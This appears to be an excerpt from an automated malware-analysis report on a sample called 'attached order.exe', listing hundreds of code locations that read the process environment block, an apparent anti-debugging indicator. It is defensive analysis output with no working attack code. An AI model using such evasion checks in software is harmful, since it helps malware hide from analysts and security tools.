                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F86A8 mov eax, dword ptr fs:[00000030h]3_2_017F86A8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738690 mov eax, dword ptr fs:[00000030h]3_2_01738690
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC691 mov eax, dword ptr fs:[00000030h]3_2_017BC691
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740680 mov eax, dword ptr fs:[00000030h]3_2_01740680
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736970 mov eax, dword ptr fs:[00000030h]3_2_01736970
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174096B mov eax, dword ptr fs:[00000030h]3_2_0174096B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174096B mov eax, dword ptr fs:[00000030h]3_2_0174096B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01754955 mov eax, dword ptr fs:[00000030h]3_2_01754955
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01754955 mov eax, dword ptr fs:[00000030h]3_2_01754955
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C958 mov eax, dword ptr fs:[00000030h]3_2_0176C958
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C944 mov eax, dword ptr fs:[00000030h]3_2_0176C944
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175E94E mov eax, dword ptr fs:[00000030h]3_2_0175E94E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0178693A mov eax, dword ptr fs:[00000030h]3_2_0178693A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0178693A mov eax, dword ptr fs:[00000030h]3_2_0178693A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0178693A mov eax, dword ptr fs:[00000030h]3_2_0178693A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_018029CF mov eax, dword ptr fs:[00000030h]3_2_018029CF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_018029CF mov eax, dword ptr fs:[00000030h]3_2_018029CF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F892E mov eax, dword ptr fs:[00000030h]3_2_017F892E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F892E mov eax, dword ptr fs:[00000030h]3_2_017F892E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC920 mov ecx, dword ptr fs:[00000030h]3_2_017AC920
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC920 mov eax, dword ptr fs:[00000030h]3_2_017AC920
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC920 mov eax, dword ptr fs:[00000030h]3_2_017AC920
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC920 mov eax, dword ptr fs:[00000030h]3_2_017AC920
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01786912 mov eax, dword ptr fs:[00000030h]3_2_01786912
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762919 mov eax, dword ptr fs:[00000030h]3_2_01762919
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762919 mov eax, dword ptr fs:[00000030h]3_2_01762919
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017309F0 mov eax, dword ptr fs:[00000030h]3_2_017309F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017649F0 mov eax, dword ptr fs:[00000030h]3_2_017649F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017649F0 mov eax, dword ptr fs:[00000030h]3_2_017649F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0180492D mov eax, dword ptr fs:[00000030h]3_2_0180492D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017389C0 mov eax, dword ptr fs:[00000030h]3_2_017389C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017389C0 mov eax, dword ptr fs:[00000030h]3_2_017389C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017689B0 mov edx, dword ptr fs:[00000030h]3_2_017689B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C69B0 mov eax, dword ptr fs:[00000030h]3_2_017C69B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C69B0 mov eax, dword ptr fs:[00000030h]3_2_017C69B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C69B0 mov ecx, dword ptr fs:[00000030h]3_2_017C69B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173E9A0 mov eax, dword ptr fs:[00000030h]3_2_0173E9A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B89A0 mov eax, dword ptr fs:[00000030h]3_2_017B89A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C98F mov eax, dword ptr fs:[00000030h]3_2_0176C98F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C98F mov eax, dword ptr fs:[00000030h]3_2_0176C98F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C98F mov eax, dword ptr fs:[00000030h]3_2_0176C98F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC870 mov eax, dword ptr fs:[00000030h]3_2_017BC870
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0835 mov eax, dword ptr fs:[00000030h]3_2_017E0835
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C819 mov eax, dword ptr fs:[00000030h]3_2_0176C819
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176C819 mov eax, dword ptr fs:[00000030h]3_2_0176C819
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A8F0 mov eax, dword ptr fs:[00000030h]3_2_0173A8F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A8F0 mov eax, dword ptr fs:[00000030h]3_2_0173A8F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A8F0 mov eax, dword ptr fs:[00000030h]3_2_0173A8F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A8F0 mov eax, dword ptr fs:[00000030h]3_2_0173A8F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A8F0 mov eax, dword ptr fs:[00000030h]3_2_0173A8F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173A8F0 mov eax, dword ptr fs:[00000030h]3_2_0173A8F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017648F0 mov eax, dword ptr fs:[00000030h]3_2_017648F0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C88FB mov eax, dword ptr fs:[00000030h]3_2_017C88FB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017428C0 mov eax, dword ptr fs:[00000030h]3_2_017428C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017288C8 mov eax, dword ptr fs:[00000030h]3_2_017288C8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017288C8 mov eax, dword ptr fs:[00000030h]3_2_017288C8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017308CD mov eax, dword ptr fs:[00000030h]3_2_017308CD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017308CD mov eax, dword ptr fs:[00000030h]3_2_017308CD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E8890 mov eax, dword ptr fs:[00000030h]3_2_017E8890
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E8890 mov eax, dword ptr fs:[00000030h]3_2_017E8890
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B488F mov eax, dword ptr fs:[00000030h]3_2_017B488F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01756882 mov eax, dword ptr fs:[00000030h]3_2_01756882
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01756882 mov eax, dword ptr fs:[00000030h]3_2_01756882
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01756882 mov eax, dword ptr fs:[00000030h]3_2_01756882
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177088E mov eax, dword ptr fs:[00000030h]3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177088E mov edx, dword ptr fs:[00000030h]3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0177088E mov eax, dword ptr fs:[00000030h]3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AB70 mov eax, dword ptr fs:[00000030h]3_2_0173AB70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AB70 mov eax, dword ptr fs:[00000030h]3_2_0173AB70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AB70 mov eax, dword ptr fs:[00000030h]3_2_0173AB70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AB70 mov eax, dword ptr fs:[00000030h]3_2_0173AB70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AB70 mov eax, dword ptr fs:[00000030h]3_2_0173AB70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AB70 mov eax, dword ptr fs:[00000030h]3_2_0173AB70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736B70 mov eax, dword ptr fs:[00000030h]3_2_01736B70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736B70 mov eax, dword ptr fs:[00000030h]3_2_01736B70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736B70 mov eax, dword ptr fs:[00000030h]3_2_01736B70
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E6B77 mov eax, dword ptr fs:[00000030h]3_2_017E6B77
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01764B79 mov eax, dword ptr fs:[00000030h]3_2_01764B79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176CB20 mov eax, dword ptr fs:[00000030h]3_2_0176CB20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCB20 mov eax, dword ptr fs:[00000030h]3_2_017BCB20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCB20 mov eax, dword ptr fs:[00000030h]3_2_017BCB20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCB20 mov eax, dword ptr fs:[00000030h]3_2_017BCB20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804BE0 mov eax, dword ptr fs:[00000030h]3_2_01804BE0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738B10 mov eax, dword ptr fs:[00000030h]3_2_01738B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738B10 mov eax, dword ptr fs:[00000030h]3_2_01738B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738B10 mov eax, dword ptr fs:[00000030h]3_2_01738B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740B10 mov eax, dword ptr fs:[00000030h]3_2_01740B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740B10 mov eax, dword ptr fs:[00000030h]3_2_01740B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740B10 mov eax, dword ptr fs:[00000030h]3_2_01740B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740B10 mov eax, dword ptr fs:[00000030h]3_2_01740B10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175EB1C mov eax, dword ptr fs:[00000030h]3_2_0175EB1C
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CB1E mov eax, dword ptr fs:[00000030h]3_2_0172CB1E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017D6BDE mov ebx, dword ptr fs:[00000030h]3_2_017D6BDE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017D6BDE mov eax, dword ptr fs:[00000030h]3_2_017D6BDE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01758BD1 mov eax, dword ptr fs:[00000030h]3_2_01758BD1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01758BD1 mov eax, dword ptr fs:[00000030h]3_2_01758BD1
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172EBC0 mov eax, dword ptr fs:[00000030h]3_2_0172EBC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4BC0 mov eax, dword ptr fs:[00000030h]3_2_017B4BC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4BC0 mov eax, dword ptr fs:[00000030h]3_2_017B4BC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4BC0 mov eax, dword ptr fs:[00000030h]3_2_017B4BC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4BC0 mov eax, dword ptr fs:[00000030h]3_2_017B4BC0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F8BBE mov eax, dword ptr fs:[00000030h]3_2_017F8BBE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F8BBE mov eax, dword ptr fs:[00000030h]3_2_017F8BBE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F8BBE mov eax, dword ptr fs:[00000030h]3_2_017F8BBE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017F8BBE mov eax, dword ptr fs:[00000030h]3_2_017F8BBE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804B67 mov eax, dword ptr fs:[00000030h]3_2_01804B67
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4A57 mov eax, dword ptr fs:[00000030h]3_2_017B4A57
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B4A57 mov eax, dword ptr fs:[00000030h]3_2_017B4A57
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175EA40 mov eax, dword ptr fs:[00000030h]3_2_0175EA40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175EA40 mov eax, dword ptr fs:[00000030h]3_2_0175EA40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017CAA40 mov eax, dword ptr fs:[00000030h]3_2_017CAA40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017CAA40 mov eax, dword ptr fs:[00000030h]3_2_017CAA40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804AE8 mov eax, dword ptr fs:[00000030h]3_2_01804AE8
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176AA0E mov eax, dword ptr fs:[00000030h]3_2_0176AA0E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176AA0E mov eax, dword ptr fs:[00000030h]3_2_0176AA0E
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0AFF mov eax, dword ptr fs:[00000030h]3_2_017B0AFF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0AFF mov eax, dword ptr fs:[00000030h]3_2_017B0AFF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0AFF mov eax, dword ptr fs:[00000030h]3_2_017B0AFF
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750AEB mov eax, dword ptr fs:[00000030h]3_2_01750AEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750AEB mov eax, dword ptr fs:[00000030h]3_2_01750AEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750AEB mov eax, dword ptr fs:[00000030h]3_2_01750AEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730AED mov eax, dword ptr fs:[00000030h]3_2_01730AED
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730AED mov eax, dword ptr fs:[00000030h]3_2_01730AED
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730AED mov eax, dword ptr fs:[00000030h]3_2_01730AED
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740ACE mov eax, dword ptr fs:[00000030h]3_2_01740ACE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01740ACE mov eax, dword ptr fs:[00000030h]3_2_01740ACE
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E6A80 mov eax, dword ptr fs:[00000030h]3_2_017E6A80
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017D6D79 mov esi, dword ptr fs:[00000030h]3_2_017D6D79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804DA7 mov eax, dword ptr fs:[00000030h]3_2_01804DA7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017ACD40 mov eax, dword ptr fs:[00000030h]3_2_017ACD40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017ACD40 mov eax, dword ptr fs:[00000030h]3_2_017ACD40
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov ecx, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175AD20 mov eax, dword ptr fs:[00000030h]3_2_0175AD20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0D24 mov eax, dword ptr fs:[00000030h]3_2_017E0D24
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0D24 mov eax, dword ptr fs:[00000030h]3_2_017E0D24
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0D24 mov eax, dword ptr fs:[00000030h]3_2_017E0D24
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017E0D24 mov eax, dword ptr fs:[00000030h]3_2_017E0D24
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175CD10 mov eax, dword ptr fs:[00000030h]3_2_0175CD10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175CD10 mov ecx, dword ptr fs:[00000030h]3_2_0175CD10
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0173AD00 mov eax, dword ptr fs:[00000030h]3_2_0173AD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750D01 mov eax, dword ptr fs:[00000030h]3_2_01750D01
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C8D0A mov eax, dword ptr fs:[00000030h]3_2_017C8D0A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCD00 mov eax, dword ptr fs:[00000030h]3_2_017BCD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BCD00 mov eax, dword ptr fs:[00000030h]3_2_017BCD00
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172EDFA mov eax, dword ptr fs:[00000030h]3_2_0172EDFA
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FCDEB mov eax, dword ptr fs:[00000030h]3_2_017FCDEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017FCDEB mov eax, dword ptr fs:[00000030h]3_2_017FCDEB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017EADD6 mov eax, dword ptr fs:[00000030h]3_2_017EADD6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017EADD6 mov eax, dword ptr fs:[00000030h]3_2_017EADD6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728DCD mov eax, dword ptr fs:[00000030h]3_2_01728DCD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762DBC mov eax, dword ptr fs:[00000030h]3_2_01762DBC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01762DBC mov ecx, dword ptr fs:[00000030h]3_2_01762DBC
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804D4B mov eax, dword ptr fs:[00000030h]3_2_01804D4B
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01726DA6 mov eax, dword ptr fs:[00000030h]3_2_01726DA6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736D91 mov eax, dword ptr fs:[00000030h]3_2_01736D91
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CD8A mov eax, dword ptr fs:[00000030h]3_2_0172CD8A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CD8A mov eax, dword ptr fs:[00000030h]3_2_0172CD8A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C79 mov eax, dword ptr fs:[00000030h]3_2_01730C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C79 mov eax, dword ptr fs:[00000030h]3_2_01730C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01730C79 mov eax, dword ptr fs:[00000030h]3_2_01730C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
